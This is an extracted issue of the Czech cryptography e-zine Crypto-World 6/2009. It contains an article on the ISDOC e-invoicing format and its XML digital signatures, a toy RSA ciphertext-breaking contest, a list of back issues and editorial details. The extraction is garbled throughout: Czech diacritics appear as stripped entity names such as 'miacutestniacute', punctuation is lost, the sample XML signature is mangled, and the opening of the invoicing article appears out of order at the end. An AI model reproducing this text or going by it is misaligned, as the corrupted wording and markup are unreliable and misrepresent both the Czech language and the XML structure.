Doklady v miacutestniacute i ciziacute měně

Všechny doklady mohou byacutet buď v miacutestniacute nebo v jedneacute ciziacute měně Tuto omezujiacuteciacute podmiacutenku jsme stanovili po analyacuteze vyacuteskytu cizoměnnyacutech dokladů s viacutece než jednou měnou Podle našich zjištěniacute je takovyacutech dokladů jen velmi maleacute množstviacute Z tohoto důvodu a současně takeacute z důvodu neuacuteměrneacuteho zkomplikovaacuteniacute vnitřniacutech vazeb jsme rozhodli se touto variantou nadaacutele nezabyacutevat Identifikace až 5-ti různyacutech stran na dokladu

Protože na dokladech se běžně vyskytujiacute kromě adres odběratele a dodavatele zapsanyacutech v obchodniacutem rejstřiacuteku ještě adresy dalšiacute např adresy fakturačniacutech miacutest či adresy dodaacuteniacute podporuje ISDOC až 5 takovyacutech Důležiteacute je to i proto že zaacutekon dovoluje pověřit fakturaciacute třetiacute osobu Důležiteacute je že rozlišovaciacute položky pro identifikaci firem dovolujiacute použitiacute jak firemniacutech (proprietaacuterniacutech) koacutedů tak celosvětovyacutech GLN (Global Location Number) identifikaacutetorů a samozřejmě takeacute naacuterodniacutech identifikačniacutech čiacutesel kteryacutem je v ČR uacutedaj IČ

Identifikace zbožiacute až 5-ti rozlišujiacuteciacutemi uacutedaji

Podobně jako v přiacutepadě firem je u rozlišeniacute zbožiacute podporovaacuteno hned několik druhů identifikaacutetorů Jsou to až 3 různeacute koacutedy podle dodavatele daacutele globaacutelniacute identifikaacutetor typu EAN a pro spolupraacutece typu bdquomalyacute dodavatel a obrovskyacute odběratelldquo i koacutedy zbožiacute podle odběratele

Podpora seacuteriovyacutech čiacutesel a šaržiacute vč expiraciacute

Protože předmětem obchodu a tedy i fakturace je často zbožiacute u ktereacuteho je třeba evidovat jednotlivaacute seacuteriovaacute čiacutesla (typicky velkaacute elektronika) nebo seacuterie zbožiacute se stejnou šaržiacute (typicky leacuteky či potraviny) obsahuje ISDOC přiacuteslušneacute kolekce i na tyto eventuality

Možnost použitiacute tzv uživatelskyacutech položek

Technicky se jednaacute o zvlaacuteštniacute nevalidovaneacute kolekce hlavičkovyacutech a řaacutedkovyacutech položek ktereacute nejsou zaacuteměrně nijak svaacutezaacuteny s hlavniacutem XSD scheacutematem Tiacutem je možno ve standardizovaneacutem formaacutetu použiacutevat i položky na kteryacutech se vyacutestavce a přiacutejemce dohodli bilateraacutelně Napřiacuteklad bude-li nutno na fakturačniacutem řaacutedku se spotřebou elektrickeacute energie v KWh přeneacutest ještě doplňkovou informaci v jakyacutech sazbaacutech se čerpaacuteniacute uskutečnilo jakyacute byl paušaacutelniacute poplatek za konkreacutetniacute elektroměr a nakolik zaacutekaniacutek využil možnost vyacutekupu zeleneacute energie tak je to touto cestou možneacute aniž je nutno měnit celkovou verzi formaacutetu a na všech stranaacutech jiacute implementovat V praxi tak informačniacute systeacutemy vyacutestavce a přiacutejemce mohou byacutet upraveny k použiacutevaacuteniacute těchto položek zatiacutemco ostatniacute systeacutemy tyto položky nebudou interpretovat protože tyto nejsou popsaacuteny ve validačniacutech scheacutematech Položky povinneacute pro daňovyacute doklad však obsahuje každyacute soubor ISDOC

Řešeniacute přiacuteloh jako dokumentů majiacuteciacutech praacutevniacute relevanci k faktuře

Protože v papiacuteroveacute praxi se často vyskytujiacute u faktur takeacute přiacutelohy ktereacute mohou miacutet i praacutevniacute relevanci k mateřskeacutemu dokladu museli jsme za viděniacute ciacutele nahradit papiacuteroveacute řešeniacute elektronickyacutem řešit i tyto situace Přiacutelohy mohou obsahovat napřiacuteklad všeobecneacute obchodniacute podmiacutenky přiacutelohou může byacutet kalkulačniacute list k faktuře na parkety stejně jako fotografie billboardu k faktuře na reklamniacute služby Řešeniacute se v zaacutesadě děliacute na ty ktereacute musiacute omezit velikost přiacuteloh a na ty ostatniacute kde to nutneacute neniacute K omezeniacute velikosti přiacuteloh se přistupuje v přiacutepadě kdy přiacutelohy jsou součaacutestiacute samotneacuteho XML (v přiacuteslušneacutem koacutedovaacuteniacute např BASE64) a jejich nadměrnaacute velikost by tak mohla zcela ochromit zachaacutezeniacute s přiacuteslušnyacutem souborem (funce načteniacute do paměti verifikace proti XSD atd) Proto jsme se v definici ISDOC vydali druhou cestou kterou je udržovaacuteniacute přiacuteloh mimo vlastniacute XML soubor ndash v jineacutem datoveacutem

Crypto-World 62009

16

kontejneru Formaacutet ISDOC jsou tedy ve skutečnosti formaacutety dva Jeden je soubor isdoc což je vnitřně bdquoklasickyacuteldquo XML soubor kteryacute neobsahuje žaacutedneacute přiacutelohy a použije se praacutevě v tomto přiacutepadě Druhyacutem formaacutetem je soubor isdocx kteryacute je vnitřně souborem typu ZIP a kteryacute může kromě bdquohlavniacuteholdquo souboru isdoc neacutest i libovolneacute dalšiacute soubory jako přiacutelohy daneacuteho dokladu Vtip je v tom že jednotliveacute přiacutelohy jsou referencovaacuteny v přiacuteslušneacute kolekci bdquohlavniacuteholdquo isdoc souboru svyacutem jmeacutenem a SHA1 otiskem A jak již bylo uvedeno celyacute obsah dokladu isdoc je podepsaacuten elpodpisem Tiacutem jsou soubory přiacuteloh sice technicky umiacutestěny vně XML (a nezdržujiacute jeho zpracovaacuteniacute) ale současně se jakaacutekoliv manipulace s přiacutelohami okamžitě projeviacute porušeniacutem SHA1 otisků jednotlivyacutech přiacuteloh přiacutepadně rovnou neplatnostiacute elektronickeacuteho podpisu celeacute faktury pokud by se někdo pokoušel v niacute SHA1 otisky přiacuteloh ručně přepsat Tiacutem by byl soubor isdoc prohlaacutešen za neautentickyacute (pozměněnyacute) Vyacutesledneacute řešeniacute tedy splňuje splňuje stejnaacute bezpečnostniacute kriteacuteria jako kdyby přiacutelohy byly celeacute součaacutestiacute jedineacuteho podepsaneacuteho XML

Vlastniacute implementace elektronickeacuteho podpisu Po provedeniacute rešerše technik podepisovaacuteniacute jsme pro přiacutepad podepisovaacuteniacute XML souboru isdoc zvolili normu XMLSig metodu Enveloped Jejiacutem principem je že těsně před ukončeniacutem rootoveacuteho elementu kteryacutem je v našem přiacutepadě element ltInvoicegt se vložiacute element ltSignaturegt ve ktereacutem se celyacute podpis odehraacutevaacute Uvnitř tohoto elementu jsou pak tři dalšiacute ltSignedInfogtltSignatureValuegtltKeyInfogt Element ltSignedInfogt obsahuje kromě popisu algoritmů digitaacutelniacuteho otisku algoritmů kanonikalizace a elektronickeacuteho podpisu hlavně vlastniacute digitaacutelniacute otisk celeacuteho XML dokumentu a to v elementu ltDigestValuegt Kanonikalizace je metoda kteraacute uvnitř struktury XML vyřadiacute přebytečneacute mezery viacutecenaacutesobneacute konce řaacutedků a dalšiacute neproduktivniacute znaky Pozor ale tato metoda nijak nemanipuluje s vlastniacutemi daty jednotlivyacutech elementů ktereacute i po kanonikalizaci zůstaacutevajiacute v původniacutem tvaru řešiacute pouze znaky ve struktuře XML Napřiacuteklad tedy pokud atribut nějakeacuteho elmentu je zbytečně posunut vpravo a podobně Po kanonikalizaci je proveden otisk přiacuteslušnyacutem algoritmem a pak je již programem složen celyacute element ltSignedInfogt Na tento element je naacutesledně aplikovaacuten elektronickyacute podpis zvolenou metodou v drtiveacute většině se použiacutevaacute algoritmus RSA a vyacutesledek je uložen do elementu ltSignatureValuegt Aby přiacutejemce měl vždy po ruce veřejnyacute kliacuteč podepisujiacuteciacute osoby je jako třetiacute element přidaacutena binaacuterniacute reprezentace jeho certifikaacutetu a to do jednoho z podelementů elementu ltKeyInfogt

Poznaacutemka od 112010 je podle světovyacutech doporučeniacute zapovězeno v systeacutemech veřejneacute spraacutevy v ČR použiacutevaacuteniacute digitaacutelniacutech otisků algoritmem SHA1 a je nutno přejiacutet na některyacute vyššiacute algoritmus z rodiny SHA2 napřiacuteklad SHA256 Pracovniacute skupina SPIS na tomto probleacutemu aktuaacutelně pracuje

Konkreacutetniacute provedeniacute podpisu v XML souboru faktury by mohlo po určiteacutem zjednodušeniacute a naformaacutetovaacuteniacute vypadat např takto

ltxml version=10 encoding=utf-8gt ltInvoice xmlns=httpisdoccznamespaceinvoice version=51gt lt--helliphelliphelliphelliphelliphellip--gt ltmdashpoložky dokumentu faktura--gt lt--helliphelliphelliphelliphelliphellip--gt ltPaymentMeansgt ltmdashposledni element nepodepsane faktury- --gt ltPaymentMeansgt

Crypto-World 62009

17

ltSignature xmlns=httpwwww3org200009xmldsi ggt ltSignedInfogt

ltCanonicalizationMethod Algorithm=httpwwww3or gTR2001REC-xml- c14n-20010315gt ltSignatureMethod Algorithm=httpwwww3org2000 09xmldsigrsa- sha1gt

ltReference URI=gt ltTransformsgt

ltTransform Algorithm=httpwwww3org200009xml dsigenveloped-signaturegt

ltTransformsgt ltDigestMethod Algorithm=httpwwww3org2000 09xmldsigsha1gt ltDigestValuegt29hg161shG5T0cuwyUEQZiHmn4=ltDiges tValuegt ltReferencegt ltSignedInfogt ltSignatureValuegtrJgOKTSyaGb5 atd==ltSignatureVa luegt ltKeyInfogt ltX509Datagt ltX509CertificategtMIIEVCCAz+gAKoZIhvcNAQAwaDELmak GA1UEBhMCQ1ox hellip vlastni klientskyacute certifikaacutet hellip qoF4Y1IgJ0w16ws= ltX509Certificategt ltX509Datagt ltKeyInfogt ltSignaturegt ltInvoicegt

Podpora formaacutetu v jednotlivyacutech ISERP V době psaniacute tohoto člaacutenku (červen 2009) ještě neniacute možneacute hodnotit uacuteroveň implementace v jednotlivyacutech IS protože většina vyacuterobců jiacute plaacutenuje až do podzimniacutech nebo zimniacutech legislativniacutech verziacute Nepochybně bude velmi zajiacutemaveacute porovnat jak jednotliviacute vyacuterobci k implementaci formaacutetu ISDOC ve svyacutech systeacutemech přistoupili Ať to ale provedou tak či onak důležiteacute je že fakturu nebude v systeacutemu přiacutejemce třeba znovu typovat a že položky budou automaticky (nebo alespoň poloautomaticky) rozeznaacuteny V tom se skryacutevaacute siacutela celeacuteho řešeniacute na straně přiacutejemce

Podpora formaacutetu externiacutemi naacutestroji Pro uacutečely podpory průmysloveacuteho nasazeniacute formaacutetu ISDOC již existujiacute i externiacute naacutestroje Jeden z nich vyvinula firma ABRA Software a pojmenovala jej ISDOCReader Jde o freeware tj program kteryacute je možneacute kdykoliv staacutehnout z přiacuteslušneacute adresy (wwwisdocorg) a začiacutet jej volně použiacutevat Tento naacutestroj provede po instalaci asociaci s oběma variantami formaacutetu ISDOC (isdoc i isdocx) a stane se tak vyacutechoziacutem prohliacutežečem tohoto formaacutetu ISDOCReader dovoluje libovolnyacute fakturačniacute doklad zobrazit do vizuaacutelniacute podoby faktury ověřit přiacuteslušnyacutem tlačiacutetkem elektronickyacute podpis dokladu přiacutepadně si doklad i vytisknout Je takeacute možneacute prohliacutežet a exportovat přiacutepadneacute přiacutelohy faktury Dalšiacutem krokem bdquoworkflowldquo zpracovaacuteniacute došleacute elektronickeacute faktury v menšiacute firmě je pak jejiacute postoupeniacute k automatickeacutemu či poloautomatickeacutemu zpracovaacuteniacute do ISERP přiacutejemce k čemuž je opět přiacuteslušneacute tlačiacutetko Technicky bude možnost odeslaacuteniacute dokladu do libovolneacuteho ISERP vyřešena pomociacute konfiguračniacuteho souboru kteryacute si každyacute vyacuterobce bude moci daacutet do sveacute instalace a kteryacute ISDOCReader bude volat

Crypto-World 62009

18

Přiacuteklad použitiacute freewaroveacuteho naacutestroje ISDOCReader na ověřeniacute elpodpisu

Pokud se některyacute z laskavyacutech čtenaacuteřů bude zajiacutemat o projekt ISDOC podrobněji dalšiacute informace včetně posledniacute verze formaacutetu dokumentace jeho datovyacutech struktur přiacutekladů datovyacutech souborů i aktuaacutelniacutech uacutedajů o podpoře formaacutetu jednotlivyacutemi vyacuterobci software nalezne na adrese wwwisdoccz Literatura

[1] Kolektiv autorů Dokumentace ke standardu UBL 20 [online] Dostupnyacute z WWW lthttpdocsoasis-openorgublcs-UBL-20UBL-20htmlgt

[2] Kosek Jiřiacute XML scheacutemata [online] Dostupnyacute z WWW lthttpwwwkosekczxmlschemawxshtmlgt

[3] Kolektiv autorů XSD Schema tutorial [online] Dostupnyacute z WWW lthttpwwww3schoolscomschemadefaultaspgt

[4] Kolektiv autorů sdruženiacute W3c Dokumentace ke Xmldsig [online] Dostupnyacute z WWW lthttpwwww3orgTRxmldsig-coregt

[5] Kolektiv autorů Pracovniacute skupiny pro elektronickou fakturaci SPIS Dokumentace k formaacutetu ISDOC [online] Dostupnyacute z WWW lthttpwwwisdocczgt

Crypto-World 62009

19

D Malaacute soutěž v luštěniacute RSA Pavel Vondruška (pavelvondruskacrypto-worldinfo)

Pro přiacuteznivce našich podzimniacutech soutěžiacute v luštěniacute ale samozřejmě i dalšiacute čtenaacuteře jsem připravil naacutesledujiacuteciacute drobnou uacutelohu Soutěžniacutem uacutekolem je rozluštěniacute šifroveacuteho textu 14 39 07 57 18 34 10 47 17 92 06 31 28 65 32 92 11 41 26 31 26 29 20 80 25 06 00 77 03 60 09 00 03 60 11 44 31 00 05 41 07 92 06 16 04 70 10 75 03 60 18 79 00 46 26 73 23 49 25 18 13 90 K zašifrovaacuteniacute otevřeneacuteho textu byl použit algoritmus RSA a formaacutetovaacuteniacute CW10 (detaily viz naacutepověda) veřejnyacute kliacuteč je (Ne)=(3337 79)

Při luštěniacute se řešitel seznaacutemiacute s algoritmem RSA a uvědomiacute si jak uacutezce souvisiacute bezpečnost algoritmu s modulem N Pro prveacute dva řešitele je připravena odměna V přiacutepadě zaacutejmu se mohou bezplatně zuacutečastnit kurzu Problematika infrastruktury veřejnyacutech kliacutečů (PKI)ldquo kterou 2562009 pořaacutedaacute akademie CZNIC (httpwwwnicczakademiecourse15detail) Lektorem kurzu je PVondruška Svaacute řešeniacute zasiacutelejte na adresu pavelvondruskacrypto-worldinfo Řešeniacute uacutelohy a jmeacutena všech uacutespěšnyacutech luštitelů budou zveřejněna v letniacutem dvojčiacutesle e-zinu Crypto-World 7-82009 kteryacute vyjde 182009 Z tohoto důvodu společně s řešeniacutem zašlete souhlas se zveřejněniacutem sveacuteho jmeacutena resp nickpseudonym kteryacute může byacutet miacutesto něj zveřejněn Přeji pěknou zaacutebavu

Doplňujiacuteciacute informace k soutěžniacute uacuteloze

1 Použityacute šifrovaciacute algoritmus

V podstatě se jednaacute o klasickyacute šifrovaciacute algoritmus založenyacute na RSA kde však otevřenyacute text neniacute formaacutetovaacuten podle PKCS 1 (verze 152021) ale podle naacutemi zadanyacutech pravidel kteraacute označiacuteme jako CW 10 2 Asymetrickyacute algoritmus RSA

Zvoliacuteme prvočiacutesla p a q a vypočteme N = pq

Φ(N) = (p-1)(q-1)

Daacutele zvoliacuteme naacutehodneacute čiacuteslo e kde

Crypto-World 62009

20

1 lt e lt Φ(N) takoveacute že e a Φ(N) jsou nesoudělnaacute

Vypočteme čiacuteslo d takoveacute že

1 lt d lt Φ(N) a

ed equiv 1 mod Φ(N)

Dvojici (Nd) nazveme soukromyacute kliacuteč a (Ne) veřejnyacute kliacuteč

3 Formaacutetovaacuteniacute zpraacutevy (CW10)

Zpraacutevu M překoacutedujeme nejprve do čiacuteselneacuteho tvaru K tomu použijeme některou vhodnou převodovou tabulku Např tuto tabulku

0 1 2 3 4 5 6 7 8 9 6 0 Mezera 2 3 4 A B C D E 7 F G H I J K L M N O 8 P Q R S T U V W X Y 9 Z 1 2 3 4 5 6 7 8 9 Zpraacutevu M pak zformaacutetujeme do posloupnosti čiacutesel pevneacute deacutelky (deacutelka bude rovna deacutelce modulu N) K tomu použijeme vlastniacute formaacutetovaacuteniacute kteraacute pracovně nazveme CW10 Formaacutetovaacuteniacute CW10 1) Maacute-li modul deacutelku k budeme zpraacutevu převedenou podle tabulky dělit na skupiny deacutelky k-1 2) Všechny skupiny musiacute miacutet deacutelku k-1 nemaacute-li proto posledniacute skupina tuto deacutelku doplniacuteme

ji zprava přiacuteslušnyacutem počtem nul 3) Všechny ziacuteskaneacute skupiny nyniacute doplniacuteme zleva jednou nulou Deacutelka každeacute skupiny je po

těchto uacutepravaacutech rovna k 4) Vyacutesledek po šifrovaacuteniacute maacute deacutelku rovnou maximaacutelně k nemaacute-li ji doplniacuteme vyacutesledek zleva

nulami Ziacuteskanyacute vyacutesledek po formaacutetovaacuteniacute M označme M= m1 m2 m3 hellip 4 Zašifrovaacuteniacute zpraacutevy M

Zašifrovaacuteniacutem zpraacutevy M pomociacute veřejneacuteho kliacuteče (Ne) rozumiacuteme řetězec

P = C1 C2 C3 kde

C1 equiv m1e mod N C2 equiv m2

e mod N C3 equiv m3e mod N Ci equiv mi

e mod N

5 Dešifrovaacuteniacute zpraacutevy P

Dešifrovaacuteniacute zpraacutevy P se pak provede tak že použijeme soukromyacute exponent d a tiacutem ziacuteskaacuteme původniacute zpraacutevu M

m1 equiv C1d mod N m2 equiv C2

d mod N m3 equiv C3d mod N mi equiv Cid mod N

6 Bezpečnost Pokud dokaacuteže přiacutejemce udržet svůj soukromyacute kliacuteč v tajnosti (a čiacutesla p a q byla dostatečně velkaacute) pak je ze znalosti šifroveacute zpraacutevy a veřejneacuteho kliacuteče vyacutepočetně složiteacute ziacuteskat otevřenou zpraacutevu

Crypto-World 62009

21

E O čem jsme psali v červnu 2000 ndash 2008 Crypto-World 62000 A Novaacute evropskaacute iniciativa v oblasti kryptografie (JPinkava) 2 B Fermatův test primality Carmichaelova čiacutesla bezčtvercovaacute čiacutesla (PVondruška)3 -5 C Červ LOVE-LETTER-FOR-YOUTXTVBS (PVondruška) 6-8 D EUROCRYPT 2000 (PVondruška) 9-11 E Code Talkers (IIIdiacutel) (PVondruška) 12-14 F Letem šifrovyacutem světem 15 G Zaacutevěrečneacute informace 16 Přiacuteloha Navajo Code Talkers revize z 1561945 soubor Dictionaryhtm

Crypto-World 62001 A Zaacutehadnaacute paacuteska z Prahy IIdiacutel (PVondruška JJanečko) 2- 6 B Radioaktivniacute rozpad a kryptografickeacute kliacuteče (LSmoliacutek) 7-9 C Kryptografie a normy diacutel 8 - Normy IETF - SMIME (J Pinkava) 10-13 D Počiacutetačovyacute kurs Lidovyacutech novin (PVondruška) 14-15 E Security and Protection of Information (D Cvrček) 16 F Praacutevniacute odpovědnost poskytovatelů (JMatejka) 17-23 G Ukončeniacute platnosti zneplatněniacute (a zrušeniacute) certifikaacutetu IIdiacutel (JProkeš) 24-25 H Letem šifrovyacutem světem 26-27 I Zaacutevěrečneacute informace 28 Přiacuteloha priloha6zip (fotografie Security 2001 teacutemata přednaacutešek na konferenci Eurocryptacute2001)

Crypto-World 62002 A Historie a statistika Crypto-Worldu (PVondruška) 2-4 B Digitaacutelniacute certifikaacutety IETF-PKIX čaacutest 4 (JPinkava) 5-8 C Bezpečnost informačniacuteho systeacutemu pro certifikačniacute služby (ISCS)

a objektovaacute bezpečnost (PVondruška) 9-16 D Informace - Cryptology ePrint Archive (VKliacutema) 17 E Letem šifrovyacutem světem 18-19

1 Kritika člaacutenku Je 1024-bitovaacute deacutelka kliacuteče RSA dostatečnaacute (Crypto-World 52002)

2 Zaacutekon o elektronickeacutem podpisu novelizovaacuten - Zaacutekon č 2262002 Sb 3 Hackeři pomozte 4 O čem jsme psali v červnu 2000 a 2001

F Zaacutevěrečneacute informace 20

Crypto-World 62003 A Nebezpečiacute internetovyacutech řešeniacute (MKuchař) 2-6 B Digitaacutelniacute certifikaacutety IETF-PKIX čaacutest 13

Atributoveacute certifikaacutety ndash diacutel 2 (JPinkava) 7-10 C Kryptografickeacute protokoly s nulovyacutem předaacuteniacutem znalostiacute(JPinkava) 11-12 D Elektronickeacute peniacuteze (PVondruška) 13-20 E Letem šifrovyacutem světem 21-23 F Zaacutevěrečneacute informace 24

Crypto-World 62009

22

Crypto-World 62004 A Měsiacutec prvočiacutesel (PVondruška) 2-5 B Statistickyacute rozbor největšiacuteho prvočiacutesla (PTesař) 6-7 C Program STORK - vstupniacute dokumenty přiacuteprava (E-CRYPT) čaacutest 2 (JPinkava) 8-16 D Letem šifrovyacutem světem 17-18 E Zaacutevěrečneacute informace 19

Crypto-World 62005 A Informace pro čtenaacuteře a autory (PVondruška) 2-3 B Kontrola certifikačniacute cesty čaacutest 1 (P Rybaacuter) 4-11 C O neziacuteskateľnosti rodneacuteho čiacutesla z jeho hashu (M Pivoluska) 12-13 D Přehledovaacute zpraacuteva o vyacuteznamnyacutech publikaciacutech a projektech na teacutema

poskytovaacuteniacute anonymity klasifikace a měřitelnost informačniacuteho soukromiacute (privacy) čaacutest 2 (M Kumpošt) 14-17

E Kryptografickeacute eskalačniacute protokoly čaacutest 1 (J Krhovjaacutek) 18-21 F Recenze knihy Jon Erickson Hacking - uměniacute exploitace 22 G O čem jsme psali v červnu 2000-2004 23 H Zaacutevěrečneacute informace 24

Crypto-World 62006 A PKI roaming (L Dostaacutelek) 2-4 B Vyhlaacuteška o podrobnostech atestačniacuteho řiacutezeniacute pro elektronickeacute naacutestroje

a lehkyacute uacutevod do časoveacute synchronizace (P Vondruška) 5-9 C Univerzaacutelniacute posilovače hašovaciacutech funkciacute včetně MD5 a SHA1

aneb zaacutechranneacute kolo pro zoufalce (V Kliacutema) 10-14 D NIST (National Institute of Standards and Technology - USA) a kryptografie Recommendation on Key Management ndash čaacutest 2

(J Pinkava) 15-18 E O čem jsme psali v červnu 1999-2005 19-20 F Zaacutevěrečneacute informace 21

Crypto-World 62007 A Přehled a historie polyalfabetickyacutech šifer (PVondruška) 2-11 B Matematizace komplexniacute bezpečnosti v ČR čaacutest I (JHrubyacute) 12-20 C Mikulaacutešskaacute kryptobesiacutedka Call for Papers 21 D O čem jsme psali v červnu 2000-2006 22-23 E Zaacutevěrečneacute informace 24 Přiacuteloha Mikulaacutešskaacute kryptobesiacutedka (6-7122007)- MKB2007_CallForPapers_cervenpdf

Crypto-World 62008 A RFID Co to vlastně maacuteme v kapse (MHlavaacuteč TRosa) 2 - 17 B Bezpečnost PHP aplikaciacute (JVraacutena) 18 - 22 C Popis šifrovaciacuteho algoritmu Serpent (JJeřaacutebek) 24 - 29 D O čem jsme psali v červnu 2000-2007 30 ndash 31 E Zaacutevěrečneacute informace 32

Crypto-World 62009

23

F Zaacutevěrečneacute informace 1 Sešit Crypto-World je oficiaacutelniacute informačniacute sešit Kryptologickeacute sekce Jednoty českyacutech matematiků a fyziků (GCUCMP) Obsahuje člaacutenky podepsaneacute autory Přiacutepadneacute chyby a nepřesnosti jsou diacutelem PVondrušky a autorů jednotlivyacutech podepsanyacutech člaacutenků GCUCMP za ně nemaacute odbornou ani jinou zodpovědnost Adresa URL na niacutež můžete najiacutet tento sešit (zpravidla 3 tyacutedny po jeho rozeslaacuteniacute) a předchoziacute sešity GCUCMP denně aktualizovaneacute novinky z kryptologie a informačniacute bezpečnosti normy standardy straacutenky některyacutech členů a dalšiacute souvisejiacuteciacute materiaacutely httpcrypto-worldinfo 2 Registrace zrušeniacute registrace Zaacutejemci o e-zin se mohou zaregistrovat pomociacute e-mailu na adrese pavelvondruskacrypto-worldinfo (předmět Crypto-World) nebo použiacutet k odeslaacuteniacute žaacutedosti o registraci elektronickyacute formulaacuteř na httpcrypto-worldinfo Při registraci vyžadujeme pouze jmeacuteno a přiacutejmeniacute titul pracoviště (neniacute podmiacutenkou) a e-mail adresu určenou k zasiacutelaacuteniacute koacutedů ke staženiacute sešitu Ke zrušeniacute registrace stačiacute zaslat kraacutetkou zpraacutevu na e-mail pavelvondruskacrypto-worldinfo (předmět rušiacutem odběr Crypto-Worldu) nebo opět použiacutet formulaacuteř na httpcrypto-worldinfo Ve zpraacutevě prosiacutem uveďte jmeacuteno a přiacutejmeniacute a e-mail adresu na kterou byly koacutedy zasiacutelaacuteny 3 Redakce

E-zin Crypto-World Redakčniacute praacutece Pavel Vondruška Staacuteliacute přispěvateleacute Pavel Vondruška Jaroslav Pinkava Jazykovaacute uacuteprava Jakub Vraacutena Přehled autorů httpcrypto-worldinfoobsahautoripdf NEWS Vlastimil Kliacutema (vyacuteběr přiacutespěvků Jaroslav Pinkava komentaacuteře a Tomaacuteš Rosa vklaacutedaacuteniacute na web) Pavel Vondruška Webmaster Pavel Vondruška jr 4 Spojeniacute (abecedně) redakce e-zinu ezincrypto-worldinfo httpcrypto-worldinfo Vlastimil Kliacutema vklimavolnycz httpcryptographyhyperlinkcz Jaroslav Pinkava JaroslavPinkavazonercz httpcrypto-worldinfopinkava Tomaacuteš Rosa t_rosavolnycz httpcryptohyperlinkcz Pavel Vondruška pavelvondruskacrypto-worldinfo httpcrypto-worldinfovondruskaindexphp Pavel Vondruškajr pavelcrypto-worldinfo httpwebdesigncrypto-worldinfo Jakub Vraacutena jakubvranacz httpwwwvranacz

Page 12: Sešit 6/2009 (452 kB)

Crypto-World 62009

12

C Formaacutet elektronickeacute fakturace ISDOC Petr Kuchař ABRA Software as (petrkucharabraeu ) sdruženiacute SPIS (petrkucharspiscz) Preambule S narůstajiacuteciacutem použiacutevaacuteniacutem ICT technologiiacute ve všech oborech lidskeacute činnosti je v posledniacutem obdobiacute pozorovatelnyacute trend většiacuteho použiacutevaacuteniacute elektronickyacutech dokumentů a jejich vyacuteměny mezi subjekty ve smyslu nahrazeniacute klasickyacutech papiacuterovyacutech postupů elektronickyacutemi V tomto duchu jde i legislativa v ČR kteraacute od roku 2000 znaacute elektronickyacute podpis od roku 2005 majiacute elektronickeacute daňoveacute doklady stejnou vaacutehu jako papiacuteroveacute a od 72009 bude možneacute autorizovaně konvertovat papiacuteroveacute dokumenty na elektronickeacute a naopak a takeacute komunikovat se staacutetem či dalšiacutemi subjekty elektronicky prostřednictviacutem tzv Datoveacute schraacutenky Vrcholem trendu elektronizace ve veřejneacute spraacutevě je pak systeacutem zaacutekladniacutech registrů schvaacutelenyacute Poslaneckou sněmovnou 1322009 kteryacute posune eGovernment v Českeacute republice po mnoha letech na zcela novou informatickou uacuteroveň Vedle přiacutekladů z veřejneacute spraacutevy je stejnyacute trend pozorovatelnyacute i ve sfeacuteře korporaacutetniacute Jedniacutem z milniacuteků je vybudovaacuteniacute formaacutetu elektronickeacute fakturace s naacutezvem ISDOC Tento formaacutet byl vystavěn Pracovniacute skupinou pro elektronickou fakturaci sdruženiacute SPIS a maacute šanci staacutet se de facto standardem elektronickeacute fakturace v ČR V řiacutejnu 2008 se 14 vyacuteznamnyacutech firem z oboru ICT rozhodlo k podpisu bdquoDeklarace o společneacutem postupu v oblasti elektronickeacute fakturaceldquo kterou se tyto subjekty zavaacutezaly formaacutet implementovat do svyacutech fakturačniacutech produktů v obdobiacute jednoho roku od jeho vyhlaacutešeniacute ke ktereacutemu došlo 1932009 Naacutesledujiacuteciacute přiacutespěvek se věnuje vysvětleniacute důvodů jeho existence technologickyacutech vyacutechodisek použityacutech při jeho naacutevrhu včetně řešeniacute problematiky elektronickeacuteho podpisu a takeacute jednomu z naacutestrojů pro jeho hromadneacute nasazeniacute

Co je formaacutet ISDOC Formaacutet ISDOC je formaacutet elektronickeacute fakturace definovanyacute jako XML soubor a popsanyacute XSD scheacutematem Součaacutestiacute formaacutetu je i zaručenyacute elektronickyacute podpis založenyacute na kvalifikovaneacutem certifikaacutetu čiacutemž se takovyacute dokument staacutevaacute daňovyacutem dokladem vystavenyacutem v elektronickeacute formě podle sect 26 odst4 zaacutekona č2352004 o dani z přidaneacute hodnoty

Hlavniacute myšlenkou formaacutetu ISDOC je umožnit korporaacutetniacutemu i veřejneacutemu sektoru posiacutelaacuteniacute datovyacutech zpraacutev jejichž interniacute formaacutet bude v souladu s našiacute legislativou bude podporovaacuten vyacuteznamnyacutemi vyacuterobci fakturačniacuteho software v ČR a hlavně bude jednotnyacute Změniacute tak leacuteta trvajiacuteciacute žalostnyacute stav informačniacute praxe v našiacute zemi kdy ač technologie i legislativa elektronickou fakturaci dovolovala se tato diacuteky existenci mnoha proprietaacuterniacutech formaacutetů různyacutech vyacuterobců nedala použiacutet v globaacutelniacutem měřiacutetku Tak v roce 2006 vznikla z iniciativy ABRA Software as ve sdruženiacute SPIS pracovniacute skupina kteraacute navaacutezala na legislativniacute rešerše svyacutech předchůdců z roku 2003 a začala hledat konkreacutetniacute legislativniacute i technologickou cestu Zaklaacutedajiacuteciacute členoveacute skupiny ABRA Software LCS International a Ernst amp Young se zaacutehy rozrostli o dalšiacute firmy jako jsou Ciacutegler Software K2Atmitec Stormware DC Concept JKR nebo Českaacute spořitelna Pozornyacute čtenaacuteř již jistě postřehl že jde většinou o konkurenty na trhu informačniacutech a ERP systeacutemů Ano je tomu tak nicmeacuteně myšlenka jednotneacuteho formaacutetu je natolik silnaacute že i firmy v přiacutemeacutem konkurenčniacutem postaveniacute jsou schopny si sednout k jednomu stolu a spolupracovat na společneacutem diacutele Kliacutečovou uacutelohu v tomto ohledu sehraacutelo Sdruženiacute pro informačniacute společnost (SPIS)

Crypto-World 62009

13

Proč ISDOC vznikl a jakyacute je jeho ciacutel Bliacutezkyacutem ciacutelem vzniku formaacutetu bylo sjednotit elektronickou podobu několika ekonomickyacutech dokumentů fakturačniacute povahy (faktura dobropis vrubopis zaacutelohovaacute faktura daňovyacute zaacutelohovyacute list a jeho dobropis) a daacutet jiacute prostřednictviacutem spolupraacutece a podpory vyacuteznamnyacutech vyacuterobců na trhu k dispozici jejich klientům - firmaacutem ktereacute se zabyacutevajiacute obchodem či službami a ktereacute z nejrůznějšiacutech důvodů neimplementovaly žaacutedneacute jineacute obecneacute řešeniacute Vzdaacutelenyacutem ciacutelem pak je dosaacutehnout tiacutemto způsobem zvyacutešeniacute produktivity praacutece v segmentu vyacuteroby a distribuce zbožiacute i v segmentu služeb což v dlouhodobeacutem horizontu pomůže Českeacute republice jako celku se prosadit v evropskeacutem kontextu jako země s velkyacutem podiacutelem služeb s vysokou přidanou hodnotou Tiacutem aktivita ISDOC plniacute i jedno ze zaacutekladniacutech poslaacuteniacute sdruženiacute SPIS

